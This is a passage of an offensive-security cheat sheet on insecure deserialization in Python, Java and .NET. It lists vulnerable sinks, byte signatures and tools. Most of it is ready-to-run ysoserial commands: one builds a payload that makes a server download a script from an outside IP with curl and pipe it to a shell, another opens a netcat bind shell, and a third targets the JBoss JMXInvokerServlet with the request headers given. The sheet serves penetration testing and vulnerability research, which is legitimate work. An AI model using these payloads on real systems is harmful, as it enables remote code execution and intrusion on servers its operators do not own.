unserialize()
```
## Python
pickle/c_pickle/_pickle with load/loads PyYAML with load jsonpickle with encode or store methods>/tmp/f ```
### Whitebox
XMLdecoder with external user defined parameters
XStream with fromXML method (xstream version <= v1.46 is vulnerable to the serialization issue)
ObjectInputStream with readObject
Uses of readObject, readObjectNodData, readResolve or readExternal
ObjectInputStream.readUnshared
Serializable
### Blackbox
AC ED 00 05 in Hex
rO0 in Base64
Content-type: application/x-java-serialized-object
### ysoserial
java -jar ysoserial.jar CommonsCollections4 'command'
```
### .Net
TypeNameHandling JavaScriptTypeResolver
AAEAAAD///// TypeObject $type
## Java Deserialization
[Java Deserialization Cheat Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet)
[How to get a full shell through Java Runtime.exec](http://codewhitesec.blogspot.de/2015/03/sh-or-getting-shell-environment-from.html)
Ysoserial payload to execute full commands
sh -c $@|sh . <payload here>
Generate a ysoserial payload to tell server to download further commands via curl and pipe to shell
java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'sh -c $@|sh . curl http://10.42.65.40/commands.sh |sh' > jenkins_curl_shell.bin
Generate a ysoserial payload to execute nc bind shell
java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'sh -c $@|sh . nc -lp 8088 -e /bin/bash' > nc-jenkins.out
### JMXInvokerServlet
./ysoserial-master-v0.0.4-gad26e2b-61.jar CommonsCollections5 "touch /tmp/pwned" >payload.txt
Generate payload with yososerial and send with Burp. You will get a jboss.invocation.InvocationException response on success or failure.
Ensure the headers match these:
POST /invoker/JMXInvokerServlet HTTP/1.1
Host: <hostname/IP>:8080
Content-Type:application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue
Content-Length: 2083
# TOOLS
### Java
- Ysoserial: https://github.com/frohoff/ysoserial
`java -jar ysoserial.jar CommonsCollections4 'command'`
Java Deserialization Scanner: https://github.com/federicodotta/Java-Deserialization-Scanner
SerialKiller: https://github.com/ikkisoft/SerialKiller
Serianalyzer: https://github.com/mbechler/serianalyzer
Java Unmarshaller Security: https://github.com/mbechler/marshalsec
Java Serial Killer: https://github.com/NetSPI/JavaSerialKiller
Android Java Deserialization Vulnerability Tester: https://github.com/modzero/modjoda
# .NET
Ysoserial.net: https://github.com/pwntester/ysoserial.net
ysoserial.exe -g ObjectDataProvider -f Json.Net -c “command-here” -o base64
# Burp-Plugins
Java: https://github.com/DirectDefense/SuperSerial
Java: https://github.com/DirectDefense/SuperSerial-Active
Burp-ysoserial: https://github.com/summitt/burp-ysoserial